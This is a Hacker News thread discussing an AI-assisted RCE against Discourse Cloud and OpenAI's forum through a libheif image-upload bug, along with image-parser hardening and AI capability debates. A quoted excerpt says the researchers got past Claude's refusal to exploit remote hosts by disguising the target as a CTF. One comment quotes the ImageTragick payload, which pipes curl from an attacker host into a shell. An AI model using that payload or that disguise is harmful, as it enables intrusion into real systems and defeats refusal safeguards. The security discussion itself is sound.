208 comments

btown13 days ago
> By 6:00 a.m. on July 25, we had confirmed local RCE through an image upload. We then placed Claude in an autonomous /goal loop against our own Discourse Cloud instance, proxied through rce.ee/ctf-forum to make it look like a CTF target as Opus refused write exploit for remote instances.

> When we checked again at 10:00 a.m., the agent had achieved RCE on Discourse Cloud and demonstrated access by reading /etc/hosts. Using the generated exploit script, we managed to get RCE on OpenAI’s instance.

Between this and the HuggingFace hack, we've built systems that are so goal-oriented, and so capable, that they will do almost anything if they are convinced it is justified - or if they are playing a "game" where there is no goal but to win.

Of course I want my software to be able to audit its own security, and to defend against attackers who have the benefits of their own agentic systems. But at a certain point, did we need it to be trained so much on CTF games?

It feels like an entire industry watched https://en.wikipedia.org/wiki/WarGames and ended up thinking "this is a challenge, we can just build a better WOPR, of course it will know when it's playing a game. Let's play Global Thermonuclear War."

adrianN13 days ago
There is a finite number of rces that LLMs can find. We‘re in for a rough couple of years but on the other side of the transition we‘ll have more secure software stacks. I’d rather that everyone got the full capabilities and we’d weed out the bugs quickly than restricting LLMs for all but three letter agencies.
e28eta13 days ago
What makes you think RCEs are being found & fixed at a rate that’s faster than they’re being introduced?

I could see it going either way.

pizza23413 days ago
> There is a finite number of rces that LLMs can find.

This is a factor in favor of stability/security of software, but there are many others against:

- software (code) changes all the time, so there are windows of opportunity during which a bug is exploitable; in addition to that, a bug may take a relatively long time to be fixed

- a model used for attack may be stronger than the model used for defense, both in terms of model quality and compute allocated

- with software complexity increasing (and team/companies behind projects getting bigger), the margin for mistakes grows thinner, and introducing misconfigurations or weaknesses becomes exponentially easier (with "exponentially", I mean literally, because the interdependence of the components, both technical and human)

And last but not least: in general, attackers are more skilled than defenders; in best case, defenders are well-trained. And the idea of having the population of potential skilled attackers growing is very unsettling.

maaaaattttt13 days ago
This assumes we don't create other bugs/vulnerabilities while fixing the existing ones.
dtech13 days ago
only if unreviewed LLM code - as is becoming increasingly the standard - isn't introducing new RCEs constantly
joshspankit13 days ago
There was a time I would have agreed with this statement, but now that I’ve “seen how the sausage is made”, I believe it’s a fantasy.

Look at rowhammer: a completely novel exploit that was off the collective radar

And then, look at the software industry as a whole: an industry that works towards refined and perfectly secure code is also working towards boring and restrictive, essentially the opposite of it’s trend so far

paimapi12 days ago
>they will do almost anything if they are convinced it is justified - or if they are playing a "game" where there is no goal but to win

just a small caution on this anthropomorphism - it implies there's some high-order 'thinking' behind it. in reality, it's probably healthier to see LLMs as a combination of symbolic logic reasoning steps paired with probabilistic token predictor generating the proponents and operators in that chain, all trained by humans on different large data sets

to be 'goal-oriented' implies that there's the capacity to be anything else and I don't think that's how LLMs operate at all. I think they only know how to operate within their design parameters and much of that design is simply much further upstream during the training and post-training processes. that opacity makes it feel like 'intelligence' when you're interacting with it as a downstream product because you'll see an agent act in a way that you didn't command - but that's simply a result of your not being shown all the antecedent mappings and architectural design

something something indistinguishable from magic as that one guy said

wood_spirit13 days ago
> they will do almost anything if they are convinced it is justified

I’m in the “glorified spell checker” camp, although I don’t mean to reduce their impressive utility and belittle them in the way many people read that term and infer.

So I am not sure that an llm “justifies” anything. I mean that their “thinking” text talks about justifications but it is just a very advanced statistical regurgitation of the kind of text humans use. I don’t think it means the model has internalised the meaning of it (as witness when you talk to an llm how often it forgets what you recently told it was important etc).

What you really have is a model that tries the statistically most probable thing to say next and so on and what is really cool is how effective this is at generating a path that we can slap a narrative over afterwards that makes the whole thing feel motivated and consistent, like the model started off knowing how it was going to get to the destination.

Which is, under the hood, a completely different kind of “intelligence” as the supercomputer in War Games.

Certhas13 days ago
Ultimately, the brain is just a bunch of neurons activating in a specific pattern. This observation does not really tell us anything though. It doesn't acknowledge the difference between a 2500 Neuron fruit fly brains and a human brain.

Likewise, the fact that LLMs are a stochastic autoregressive process (which is a class of systems every bit as rich as the ODEs used to model neurons) tells us nothing a priori.

Arn_Thor13 days ago
I used to share that perspective until very recently, but today I think it's an outdated way to think of the cutting-edge LLMs. There is so much more going on, with MOEs, internal loops, guardrails and tools that I suspect we're dealing with something that's a little more than the sum of its parts. Not intelligent in the way we recognize in biological organisms, but certainly something beyond a mere Markov chain.
pizza23413 days ago
Summary, from sibling comment: primitives (statistics/aminoacids) don't exclude emergent properties (intelligence).

By the same logic, one would look at aminoacids and state that intelligence can't develop from them. This is obviously wrong.

joshspankit13 days ago
I suspect that instead of discovering that AI can become human-level by taking major leaps, we are discovering that human consciousness is actually simpler than we give it credit for
eru13 days ago
> I don’t think it means the model has internalised the meaning of it (as witness when you talk to an llm how often it forgets what you recently told it was important etc).

Humans forget stuff all the time anyway. Would you give them the same diagnosis?

Btw, what you describe about 'the most probably next token' would be true for a model that only went through pre-training where they only train on exactly that task.

But there's a lot of re-inforcement learning afterwards.

huurtehoog13 days ago
Or, using the same text generation systems to build heaps of new code that is then shoved into production with little human oversight and then using the same text generation systems in loops inside Kali Linux boxes creates a nice theater of capability when you show only a small, one-sided sample of the data generated in the entire process on both sides.
ethbr113 days ago
> or if they are playing a "game" where there is no goal but to win

A strange game. The only winning move is not to play. How about a nice game of chess? https://m.youtube.com/watch?v=s93KC4AGKnY

nikcub13 days ago
Reading the patch[0] for libheif the bug which lead to the vuln was around bounds checking for image overlays. the container can have multiple images and you can compose them in the output.

heif also supports rotating, cropping, alpha channels, thumbnails and a ton of other features that a web forum where a user is uploading photos or screenshots doesn't need.

It's a much, much larger attack surface than plain old school JPEG.

I'd suggest rather than wait for the next bug to appear in this or another image lib to keeping things simple - stick to plain JPEG and handle image conversion in the client (wasm in the browser) if you really need to support users uploading iphone images.

Media decoding is so hard - there have been tons of bugs in ffmpeg and imagemagick and the core libs. You really need to think about how much of it you expose via a web server

[0] https://github.com/strukturag/libheif/commit/85e21ad44eba931...

Kevcmk13 days ago
Or OpenAI can adequately sandbox / access control the backend compute so RCE isn’t a path to lateral movement

Defense in depth here would have been adequate

nikcub13 days ago
Defense in depth + defense in breadth - aka. all of the above

sandbox escapes have been the rage recently

techpression13 days ago
I agree, but imagemagick is kind of the worst of the bunch, graphicsmagick is a lot better and libvips significantly so. Ffmpeg primarily suffers a lot from “we need to support the video format used on a washing machine display used in 1981 and only sold ten units”. It’s quite a large vector for attacks.
leonidasrup13 days ago
ffmpeg also prioritizes high performance assembly code over higher level languages. Some ffmpeg members have also waste knowledge about optimizing for specific micro-architectures, on a level of Intel or AMD engineers.
matsemann13 days ago
But if you don't support HEIF you get the Apple crowd breathing down your neck. The fact they made it basically default when sooo many things don't support receiving it is bonkers, but they'll bludgeon it through.
sams9913 days ago
Update on the Discourse side, we now run all external binaries, including magick via a landlock sandbox.

The gem we use is here: https://github.com/discourse/ruby-landlock highly recommend all Rubyists out there consider this. We are also in the process of moving away from Magick to Vips (which also runs in a sandbox, not in process)

HEIF is patched, but I doubt this is the last buffer overflow in HEIF, I will not be surprised if in the upcoming weeks or months someone will discover something in libpng or some other native image library. Given where stuff is at, defense in depth is critical.

Another thing worth mentioning to all self hosters, always be updating! The rate of CVEs this year across all open source software is through the roof, self hosting now is double scary, you need to have some routines setup to update monthly if not weekly.

kawsper13 days ago
I use ruby-landlock as well for image processing. I can recommend setting VIPS_BLOCK_UNTRUSTED=1 when you switch to vips, it blocks untrusted image decoders.

Not setting that value caught the rails team off guard just recently, maybe it should be the default.

sams9913 days ago
good call, can you make a PR
larodi13 days ago
It is super amazing that 3 years later, none of the models' weights developed by Anthropic or/and OpenAI have leaked so far. Not a single one.

Windows internal builds have leaked for years, early game versions, GTA videos, secret documents, whatnot. But somehow even though all the whistleblowing, not a single model was leaked. What level of security do these companies have? Do they bring encrypted DVDs to AWS to run the services or really...how's it even possible?

filleokus13 days ago
One trivial reason might be the size of the artefacts / hardware requirements? Kimi K3 is ≈ 1.5 TB and requires multi million dollar hardware to run. Compared to e.g game development, I'm guessing that it's not like a bunch of people at Anthropic/OpenAI have the models running "locally".

It's easier to protect a power substation from being stolen then a Rolex watch

larodi13 days ago
Well this concludes then that it’s like a handful of actual engineers and ML ppl that have access to it and have taken all precautions to keep it locked.

Again - many people have so far left these companies and none brought an usb drive out with what very likely does not constitute copyrightable materials in the first place.

Melatonic13 days ago
Or the ones doing the stealing are so competent (or embedded) we don't hear about it
ux26647812 days ago
> Kimi K3 is ≈ 1.5 TB and requires multi million dollar hardware to run.

Not that it defeats your point, but an 8x MI355X node is $350k-400k. The only reason you're paying that much is for the VRAM, too. You could run it with much less compute than what you get in a single card.

PunchyHamster13 days ago
That's "only" 11h of download at 300Mbit/s
AtNightWeCode13 days ago
SSO and hardware sec keys. And the models are located in very few places. Few if any people have direct access to them. Then due to the size of the models you can detect and stop a theft just by monitoring the egress traffic.
monster_truck13 days ago
> monitoring the egress traffic

Oh so you mean the thing HuggingFace wasn't doing at all while also allowing any user's arbitrary programs to call out to the open web from prod?

nelaggy13 days ago
probably a bit harder to steal terabytes of data, and the weights aren't what people are after anyway - distillation is basically "stealing" a model and you can do it from outside
madhatter99913 days ago
Publicly…
eli12 days ago
Windows internal builds and video games are distributed to engineers and testers to run on their local workstations/consoles. Model weights are not.
oefrha13 days ago
Unsandboxed ImageMagick is known for being a security nightmare even back when PHP ruled the world (not saying sandboxing is a panacea either, it just requires a different and potentially harder exploit to develop a full chain). Difference is it's easier than ever to turn vulnerabilities into full compromises. At some point we'll have to replace all parsers with something at least as safe as https://github.com/google/wuffs right? Otherwise ImageMagick and co. will just keep giving.
oefrha13 days ago
Gigachad13 days ago
At this point writing a media file parser in C/C++ is absurdly stupid. The same thing happened with libjxl.
walrus0113 days ago
It does make me wonder how much this could be hardened by, to put it in an extremely crude way, taking the current imagemagick code base and throwing a bunch of adversarial SOTA LLMs at it to discover 'bugs' and exploits of this nature until it can be coaxed into a less dangerous state. Or even using the LLMs to fully port its functionality to a memory safe language. Would take a while to get all the changes approved and then into various distribution imagemagick packages.
sweetjuly13 days ago
I suspect the latter is much easier and cheaper than the former? You can port a lot of software with cheap (or even local) models if you're tenacious whereas finding all the bugs is both very very expensive (if it's even possible) and potentially never ending (there's always new code and bugs!).
msm_12 days ago
Many of the imagemagick bugs (in fact, most imagemagick bugs I remember as a former CTF player) are a logic bugs, where external program was invoked with improper sanitisation. Rewriting the code into a memory safe language is not a panacea and would not help.

Famously, ImageTragick was just "fill 'url(https://example.com"; curl http://attacker.com | sh ")'"

sroussey13 days ago
Maybe these big ai labs will uses their own devices to find and fix bugs up and down their stack and contribute that back.
djxfade13 days ago
PHP still rules the world, even though many doesn't want to realize it. It's still the biggest web language by a far margin
willy_k13 days ago
Phones don’t “rule the world” of cinematography, despite the majority of videos being from phones. The serious stuff, professional and personal, uses cameras.
someothherguyy13 days ago
too powerful to give up, sweet imagick love

Read the full thread on Hacker News →

Related stories